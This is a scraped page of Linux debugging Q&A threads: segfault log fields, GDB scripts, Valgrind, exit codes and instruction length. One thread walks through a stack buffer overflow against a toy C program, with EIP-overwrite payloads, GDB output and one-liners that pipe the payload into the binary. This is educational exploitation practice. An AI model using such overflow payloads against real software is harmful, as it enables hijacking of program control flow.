This may be a very simple question. I am attempting to debug an application which generates the following segfault error in kern.log:
kernel: myapp[15514]: segfault at 794ef0 ip 080513b sp 794ef0 error 6 in myapp[8048000+24000]
Here are my questions:
Is there any documentation on what the different error numbers on a segfault mean? In this instance it is error 6, but I've seen error 4 and 5 as well.
What is the meaning of the information at bf794ef0 ip 0805130b sp bf794ef0 and myapp[8048000+24000]?
So far I was able to compile with symbols, and when I do x 0x8048000+24000 it returns a symbol. Is that the correct way of doing it? My assumptions thus far are the following:
sp = stack pointer?
ip = instruction pointer
at = ????
myapp[8048000+24000] = address of symbol?
When the report points to a program, not a shared library
Run addr2line -e myapp 080513b (and repeat for the other instruction pointer values given) to see where the error is happening. Better, get a debug-instrumented build, and reproduce the problem under a debugger such as gdb.
If it's a shared library
In the libfoo.so[NNNNNN+YYYY] part, the NNNNNN is where the library was loaded. Subtract this from the instruction pointer (ip) and you'll get the offset into the .so of the offending instruction. Then you can use objdump -DCgl libfoo.so and search for the instruction at that offset. You should easily be able to figure out which function it is from the asm labels. If the .so doesn't have optimizations you can also try using addr2line -e libfoo.so <offset>.
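The subtraction described above can be sketched in a few lines of Python. This is only an illustration: the regular expression is an assumption about the log format (it varies between kernel versions), the function name offset_in_object is hypothetical, and the sample line in the usage note uses the bf794ef0 / 0805130b values quoted in the question.

```python
import re

# Assumed layout of the kernel message; newer kernels may append extra fields.
SEGFAULT_RE = re.compile(
    r"segfault at (?P<addr>[0-9a-f]+) ip (?P<ip>[0-9a-f]+) sp (?P<sp>[0-9a-f]+) "
    r"error (?P<error>[0-9a-f]+) in (?P<object>[^\[]+)"
    r"\[(?P<base>[0-9a-f]+)\+(?P<size>[0-9a-f]+)\]"
)


def offset_in_object(log_line):
    """Return (object name, ip - load base) for a kernel segfault line."""
    match = SEGFAULT_RE.search(log_line)
    if match is None:
        raise ValueError("not a recognised segfault line")
    ip = int(match.group("ip"), 16)
    base = int(match.group("base"), 16)
    size = int(match.group("size"), 16)
    offset = ip - base
    # The instruction pointer should fall inside the reported mapping.
    if not 0 <= offset < size:
        raise ValueError("ip lies outside the reported mapping")
    return match.group("object"), offset
```

For the line "segfault at bf794ef0 ip 0805130b sp bf794ef0 error 6 in myapp[8048000+24000]" this gives the object myapp and the offset 0x930b, which is the value to look up in the objdump output or to pass to addr2line for a shared library.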
What the error means
Here's the breakdown of the fields:
address - the location in memory the code is trying to access (it's likely that 10 and 11 are offsets from a pointer we expect to be set to a valid value but which is instead pointing to 0)
ip - instruction pointer, ie. where the code which is trying to do this lives
sp - stack pointer
error - Architecture-specific flags; see arch/*/mm/fault.c for your platform.
Based on my limited knowledge, your assumptions are correct.
sp = stack pointer
ip = instruction pointer
myapp[8048000+24000] = address
If I were debugging the problem I would modify the code to produce a core dump or log a stack backtrace on the crash. You might also run the program under (or attach) GDB.
The error code is just the architectural error code for page faults and seems to be architecture specific. They are often documented in arch/*/mm/fault.c in the kernel source. My copy of Linux/arch/i386/mm/fault.c has the following definition for error_code:
bit 0 == 0 means no page found, 1 means protection fault
bit 1 == 0 means read, 1 means write
bit 2 == 0 means kernel, 1 means user-mode
My copy of Linux/arch/x86_64/mm/fault.c adds the following:
bit 3 == 1 means fault was an instruction fetch
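As a rough illustration of the bit definitions quoted above, the error number from the log can be decoded as follows. The function name decode_fault_error and the dictionary keys are hypothetical; only the four bits listed above are handled, and other architectures or kernel versions may define more.

```python
def decode_fault_error(code):
    """Decode an x86 page-fault error code using the four bits quoted above."""
    return {
        "cause": "protection fault" if code & 1 else "no page found",   # bit 0
        "access": "write" if code & 2 else "read",                      # bit 1
        "mode": "user" if code & 4 else "kernel",                       # bit 2
        "instruction_fetch": bool(code & 8),                            # bit 3
    }
```

With this reading, error 6 from the question is a user-mode write to an address for which no page was found, error 4 is a user-mode read of such an address, and error 5 is a user-mode read that hit a protection fault.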
If it's a shared library
You're hosed, unfortunately; it's not possible to know where the
libraries were placed in memory by the dynamic linker after-the-fact.
Well, there is still a possibility of retrieving the information, not from the binary, but from the object. You need the base address of the object, though, and this information is still in the core dump, in the link_map structure.
So first you want to import struct link_map into GDB. Let's compile a small program that uses it with debug symbols and add it to GDB.
link.c
#include <link.h>
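/* Dummy function: referencing struct link_map pulls its debug info into link.so */
void toto(void) { struct link_map *s = (struct link_map *)0x400; (void)s; }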
get_baseaddr_from_coredump.sh
#!/bin/bash
BINARY=$(which myapplication)
IsBinPIE ()
{
readelf -h $1|grep 'Type' |grep "EXEC">/dev/null || return 0
return 1
}
Hex2Decimal ()
{
export number="`echo "$1" | sed -e 's:^0[xX]::' | tr '[a-f]' '[A-F]'`"
export number=`echo "ibase=16; $number" | bc`
}
GetBinaryLength ()
{
if [ $# != 1 ]; then
echo "Error, no argument provided"
fi
IsBinPIE $1 || (echo "ET_EXEC file, need a base_address"; exit 0)
export totalsize=0
# Get PT_LOAD's size segment out of Program Header Table (ELF format)
export sizes="$(readelf -l $1 |grep LOAD |awk '{print $6}'|tr '\n' ' ')"
for size in $sizes
do Hex2Decimal "$size"; export totalsize=$(expr $number + $totalsize)
done
# A shell return status is limited to 0-255, so print the total instead
echo $totalsize
}
if [ $# = 1 ]; then
echo "Using binary $1"
IsBinPIE $1 && (echo "NOT ET_EXEC, need a base_address..."; exit 0)
BINARY=$1
fi
gcc -g3 -fPIC -shared link.c -o link.so
GOTADDR=$(readelf -S $BINARY|grep -E '\.got.plt[ \t]'|awk '{print $4}')
echo "First do the following command :"
echo file $BINARY
echo add-symbol-file ./link.so 0x0
read
echo "Now copy/paste the following into your gdb session with attached coredump"
cat <<EOF
set \$linkmapaddr = *(0x$GOTADDR + 4)
set \$mylinkmap = (struct link_map *) \$linkmapaddr
while (\$mylinkmap != 0)
if (\$mylinkmap->l_addr)
printf "add-symbol-file .%s %#.08x\n", \$mylinkmap->l_name, \$mylinkmap->l_addr
end
set \$mylinkmap = \$mylinkmap->l_next
end
EOF
This prints the whole link_map content as a set of GDB commands.
In itself this might seem unnecessary, but with the base address of the shared object in question you may get more information out of an address by debugging the involved shared object directly in another GDB instance.
Keep the first GDB session open to have an idea of the symbols.
NOTE: the script is rather incomplete. I suspect you may need to add the following value to the second parameter of the printed add-symbol-file command:
readelf -S $SO_PATH|grep -E '\.text[ \t]'|awk '{print $5}'
where $SO_PATH is the first argument of the add-symbol-file
Hope it helps
Related
I'm trying to provoke a buffer overflow in order to execute a function in C code. So far I have managed to find out the number of bytes needed to overwrite the EBP register. The only thing left is to replace the saved EIP with the address of the function I wish to execute. I'm trying to generate this payload with Python. For this I use the following:
python -c 'print "A"*112 + "\x3b\x86\x04\x08"' > attack_payload
This is what I get
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;�
Notice those last characters! I know that it's not what I was supposed to get. The address I wish to load into the EIP register is 0804863b. I had to put this in little endian for the exploit to run properly. Any comments on this?
If you run this payload:
python -c 'print "A"*112 + "B"*4' > attack_payload
and then check that you control the PC (EIP=42424242):
(gdb) r < attack_payload
You can replace the "BBBB" with your address 0804863b
python -c 'print "A"*112 + "\x3b\x86\x04\x08"' > attack_payload
That is all; just verify beforehand that you control EIP.
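The little-endian byte order mentioned in the question does not have to be typed by hand. A minimal sketch in Python 3, assuming the 112-byte padding and the address 0804863b from the question (the function name build_payload is hypothetical), lets struct.pack produce the four address bytes:

```python
import struct


def build_payload(padding_len, target_addr):
    """Padding bytes followed by a 32-bit address in little-endian order."""
    # "<I" means: little-endian, unsigned 32-bit integer.
    return b"A" * padding_len + struct.pack("<I", target_addr)
```

Because the payload contains non-printable bytes, it should be written in binary form, for example with sys.stdout.buffer.write(build_payload(112, 0x0804863B)), rather than with print. The odd characters at the end of the terminal output are simply those raw bytes being displayed.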
More info (I have seen the source code): for a simpler explanation, try compiling with the following command
gcc -o main main.c -fno-stack-protector -g -m32
Run it with the debugger (gdb ./main) and set the following breakpoint
gef➤ b 13
Breakpoint 2 at 0x8048611: file main.c, line 13.
Continue and insert the following payload
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC
Step forward to the instruction
→ 0x804862d <stringLength+60> ret
And you can see that you now control the return address
gef➤ bt
#0 0x0804862d in stringLength () at main.c:14
#1 0x43434343 in ?? ()
#2 0x08048800 in ?? ()
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
gef➤ x/x $sp
0xffffd5ec: 0x43434343
Now you can replace "CCCC" with the address of the win function
gef➤ p win
$1 = {void ()} 0x80485dd <win>
You can automate all of this with a simple Python script (have a look at the pwntools library). Your payload will be:
payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
payload += "\xdd\x85\x04\x08"
Or also you can run
python -c 'print "1"+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\xdd\x85\x04\x08"' | ./main
Let's say I'm debugging with valgrind and gdb by doing:
$ valgrind --vgdb-error=0 ./magic
...and then in a second terminal:
$ gdb ./magic
...
(gdb) target remote | /usr/lib/valgrind/../../bin/vgdb
If I want to examine the defined-ness of some memory, I can use:
(gdb) p &batman
$1 = (float *) 0xffeffe20c
(gdb) p sizeof(batman)
$2 = 4
(gdb) monitor get_vbits 0xffeffe20c 4
ffffffff
Using three commands to do one thing is kind of annoying, especially since I usually want to do this a few times for many different variables in the same stack frame. But if I try the obvious thing, I get:
(gdb) monitor get_vbits &batman sizeof(batman)
missing or malformed address
Is it possible to get gdb to evaluate &batman and sizeof(batman) on the same line as my monitor command?
But if I try the obvious thing, I get: missing or malformed address
This is from GDB doc (http://sourceware.org/gdb/onlinedocs/gdb/Connecting.html#index-monitor-1210) for the monitor cmd:
monitor cmd
This command allows you to send arbitrary commands
directly to the remote monitor. Since gdb doesn't care about the
commands it sends like this, this command is the way to extend gdb—you
can add new commands that only the external monitor will understand
and implement.
As you can see "gdb doesn't care about the commands it sends like this". It probably means that the command after monitor is not processed in any way and sent AS IS.
What you can do to evaluate your variable on the same line is to use user-defined commands in gdb (http://sourceware.org/gdb/onlinedocs/gdb/Define.html). Define your own command and use the eval gdb command to prepare your command with the necessary values (http://sourceware.org/gdb/current/onlinedocs/gdb/Output.html#index-eval-1744):
define monitor_var
eval "monitor get_vbits %p %d", &$arg0, sizeof($arg0)
end
And then use it like this:
(gdb) monitor_var batman
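The same idea can also be expressed with GDB's Python scripting, if your GDB was built with Python support. The following is a sketch under that assumption, not a tested drop-in: the command name vbits and the helper get_vbits_command are hypothetical, and the expression must denote an object that has an address.

```python
def get_vbits_command(address, size):
    """Format the monitor command text for an address and a byte count."""
    return "monitor get_vbits 0x%x %d" % (address, size)


try:
    import gdb  # only importable inside GDB's embedded Python
except ImportError:
    gdb = None

if gdb is not None:
    class VBits(gdb.Command):
        """vbits EXPR: ask Valgrind for the definedness bits of EXPR."""

        def __init__(self):
            super().__init__("vbits", gdb.COMMAND_DATA)

        def invoke(self, arg, from_tty):
            # Let GDB evaluate the expression, then forward plain numbers.
            value = gdb.parse_and_eval(arg)
            gdb.execute(get_vbits_command(int(value.address), value.type.sizeof))

    VBits()
```

After loading the file with the source command, (gdb) vbits batman would send the same monitor request as the three manual steps in the question.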
I wrote a simple test case to see how my system treats a failure indicator from main, but nothing happened. I really want to know what the difference is between return 0 and return -1.
int main()
{
return -1;
}
That depends on what your "system" is. If you just run a program then this value is ignored.
The only time this is used is if your program is part of a larger workflow where your program's failure matters. For example, a makefile (or a C++ IDE) will stop building the program if there's a failure in one of the steps. This failure is signaled by an error code from main().
Most of the time, the return value of main has no use. Traditionally, we return 0 to indicate that the program succeeded, especially on Windows. But on Linux we often have a chain of programs, where the second program's behavior depends on the first one's result. That is where the return value matters.
So, whatever the return value is, most of the time it depends on your design, and it means nothing to the system.
Hope that can help you.
Assuming you have compiled an executable named a.out, consider:
$ ./a.out # ignore the value returned from main
$ ./a.out && echo success # check the value returned from main
$ ./a.out || echo failure
In the second and third case, the echo will only occur if a.out is successful or not, respectively, where success is defined as returning zero from main. This is a convention that may be more clear with the following syntax:
if ./a.out; then
echo a.out returned zero from main
else
echo a.out returned non-zero from main
fi
The return value of main() is available:
To the shell, if the shell started it, as $status etc, depending on which shell you're using.
To the program that started it, via the status variable pointed to by the argument to wait(). See man 2 wait().
GNU has precisely nothing to do with it.
If using the bash shell (or similar), you can show the return value of the last command executed with echo $?. Sample bash terminal session:
$ false
$ echo $?
1
$ true
$ echo $?
0
$
On other systems the return value will be accessed differently. On DOS or Windows the return value can be checked with the ERRORLEVEL command or %ERRORLEVEL% variable.
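The parent-process view mentioned above (the status collected through wait()) can be sketched with Python's subprocess module. This is only an illustration: the helper name exit_status is hypothetical, and the child here is another Python interpreter rather than a compiled a.out.

```python
import subprocess
import sys


def exit_status(code):
    """Start a child process that exits with `code` and return what the parent sees."""
    child = subprocess.run(
        [sys.executable, "-c", "import sys; sys.exit(%d)" % code]
    )
    return child.returncode
```

A child that exits with 0 is reported as 0 and one that exits with 3 as 3. On Linux only the low 8 bits of the status reach the parent, so the return -1 from the question shows up as 255, which the shell treats as a failure like any other non-zero value.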
The problem I am trying to solve is that I want to dynamically compute the length of an instruction given its address (from within GDB) and set that length as the value of a variable. The challenge is that I don't want any extraneous output printed to the console (e.g. disassembled instructions, etc.).
My normal approach to this is to do x/2i ADDR, then subtract the two addresses. I would like to achieve the same thing automatically; however, I don't want anything printed to the console. If I could disable console output then I would be able to do this by doing x/2i ADDR, followed by $_ - ADDR.
I have not found a way to disable the output of a command in GDB. If you know such a way then please tell me! However, I have discovered interpreter-exec and GDB/MI. A quick test shows that doing x/2i works on GDB/MI, and the value of $_ computed by the MI interpreter is shared with the console interpreter. Unfortunately, this approach also spits out a lot of output.
Does anyone know a way to either calculate the length of an instruction without displaying anything, or how to disable the output of interpreter-exec, thus allowing me to achieve my goal? Thank you.
I'll give an arguably cleaner and more extensible solution that's not really shorter. It implements $instn_length() as a new GDB convenience function.
Save this to instn-length.py
import gdb

def instn_length(addr_expr):
    # Disassemble two instructions silently; afterwards $_ is the address of the second one
    gdb.execute('x/2i ' + addr_expr, to_string=True)
    return int(gdb.parse_and_eval('$_')) - int(gdb.parse_and_eval(addr_expr))

class InstnLength(gdb.Function):
    def __init__(self):
        super(InstnLength, self).__init__('instn_length')

    def invoke(self, addr):
        return instn_length(str(int(addr)))

InstnLength()
Then run
$ gdb -q -x instn-length.py /bin/true
Reading symbols from /usr/bin/true...Reading symbols from /usr/lib/debug/usr/bin/true.debug...done.
done.
(gdb) start
Temporary breakpoint 1 at 0x4014c0: file true.c, line 59.
Starting program: /usr/bin/true
Temporary breakpoint 1, main (argc=1, argv=0x7fffffffde28) at true.c:59
59 if (argc == 2)
(gdb) p $instn_length($pc)
$1 = 3
(gdb) disassemble /r $pc, $pc + 4
Dump of assembler code from 0x4014c0 to 0x4014c4:
An alternative implementation of instn_length() is to use the gdb.Architecture.disassemble() method in GDB 7.6+:
def instn_length(addr_expr):
    addr = int(gdb.parse_and_eval(addr_expr))
    arch = gdb.selected_frame().architecture()
    return arch.disassemble(addr)[0]['length']
I have found a suitable solution; however, shorter solutions would be preferred. This solution sets the logging file to /dev/null, sets it to be overwritten if it exists, and then temporarily redirects the console output to the log file.
define get-in-length
set logging file /dev/null
set logging overwrite on
set logging redirect on
set logging on
x/2i $arg0
set logging off
set logging redirect off
set logging overwrite off
set $_in_length = ((unsigned long) $_) - ((unsigned long) $arg0)
end
This solution was heavily inspired by another question's answer: How to get my program name in GDB when writting a "define" script?.
I executed following commands in gdb and console output is as follows:
Rohan_gdb$ set $var = 15
Rohan_gdb$ p $var
$5 = 0xf
Rohan_gdb$ set $var = (int *)10
Rohan_gdb$ p $var
$6 = (int *) 0xa
Rohan_gdb$ set $char = "abc"
Rohan_gdb$ p $char
$7 = "abc"
Rohan_gdb$ set $char = (char *)"xyz"
evaluation of this expression requires the program to have a function "malloc".
(here I got error)
Rohan_gdb$ p $char
$8 = "abc"
Rohan_gdb$
Here I am debugging on a target rather than natively. I am using GNU gdb (GDB) version 7.2. Is it possible to solve this using scripts?
I don't know how to solve your specific problem, but I ran across something similar. Given the age of the question, maybe this'll provide a clue.
The problem is that your script is trying to store a value in a buffer, and GDB must allocate a new buffer for that storage. The storage requirement is likely the result of the cast, or arises because the second string is not among the constant strings in your binary.
To fix it, either change your code so that it does not require a malloc (which is a bit hit or miss, as far as I can tell), or make the malloc symbol available: load a symbol table that allows gdb to resolve the "_malloc" symbol.
All values are interpreted in the current language. This means, for example, that if the current source language is C/C++ then searching for the string “hello” includes the trailing \0. The null terminator can be removed from searching by using casts, e.g.: {char[5]}"hello".
https://sourceware.org/gdb/onlinedocs/gdb/Searching-Memory.html
Example:
https://github.com/PhoenixInteractiveNL/emuDownloadCenter/wiki/Emulator-wincpc <-> WinCPC is the Borland Delphi port of an Amstrad CPC emulator called vbCPC.
F:\flynns_WinCPC>gdb wincpc.exe
GNU gdb (GDB) 7.6
...
This GDB was configured as "i686-pc-mingw32".
...
Reading symbols from F:\flynns_WinCPC\wincpc.exe...(no debugging symbols found)...done.
(gdb) info files
Symbols from "F:\flynns_WinCPC\wincpc.exe".
Local exec file:
`F:\flynns_WinCPC\wincpc.exe', file type pei-i386.
Entry point: 0x558448
0x00401000 - 0x005587ec is CODE
0x00559000 - 0x0055f7f8 is DATA
0x007bf000 - 0x007c1b88 is .idata
0x007c3000 - 0x007c301f is .rdata
0x007c4000 - 0x007db530 is .reloc
0x007dc000 - 0x00861c00 is .rsrc
(gdb) find 0x00401000,0x00861c00,'m','e','m','o','r','y'
0x48b224
0x48b2e8
0x48b312
0x48b33a
0x48b354
0x48c2cc
0x48cfcb
0x82d910
0x841484
0x8456f9
10 patterns found.
(gdb) find 0x00401000,0x00861c00, {char[6]} "memory"
evaluation of this expression requires the program to have a function "malloc".
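The effect of the trailing \0 described in the quoted GDB documentation can be illustrated outside GDB. The following Python sketch searches a made-up byte buffer (the buffer contents and the function name find_all are hypothetical) once with and once without the terminator. Passing the characters one by one, as in the first find command above, corresponds to the search without the terminator.

```python
def find_all(buf, pattern):
    """Return every offset in buf at which pattern starts."""
    offsets = []
    start = buf.find(pattern)
    while start != -1:
        offsets.append(start)
        start = buf.find(pattern, start + 1)
    return offsets


# Hypothetical memory contents: two C strings "memory" and the word "memoryless".
memory = b"memory\x00 memoryless memory\x00"
with_nul = find_all(memory, b"memory\x00")   # like searching for "memory" as a C string
without_nul = find_all(memory, b"memory")    # like searching for 'm','e','m','o','r','y'
```

Here with_nul is [0, 19] and without_nul is [0, 8, 19]: the occurrence inside "memoryless" is only found when the terminator is left out of the pattern.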